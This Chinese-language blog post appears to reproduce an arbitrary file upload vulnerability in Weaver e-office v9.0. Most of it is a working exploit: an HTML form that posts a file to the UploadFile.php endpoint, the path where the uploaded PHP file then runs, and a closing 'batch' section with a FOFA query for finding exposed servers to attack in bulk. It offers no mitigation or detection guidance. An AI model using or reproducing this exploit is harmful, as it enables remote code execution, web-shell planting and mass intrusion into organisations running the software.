E-Office v9前台任意文件上传漏洞

(Updated: )

0x00 前言

该漏洞是由于 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行。

0x01 影响版本

1
泛微 e-office v9.0

0x02 漏洞复现

构造上传表单

1
2
3
4
5
6
7
8
9
10
<html>
<title>泛微e-office文件上传</title>
<head></head>
<body>
<form action="http://IP:Port/general/index/UploadFile.php?
m=uploadPicture&uploadType=eoffice_logo" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="submit" value="Upload">
</body>
</html>

保存为upload.php,浏览器打开,上传phpinfo(),抓包

image-20211220214414452

上传成功

image-20211220214456151

访问http://IP:Port/images/logo/logo-eoffice.php

image-20211220214538503

0x03 批量

fofa语法

1
app="泛微-EOffice"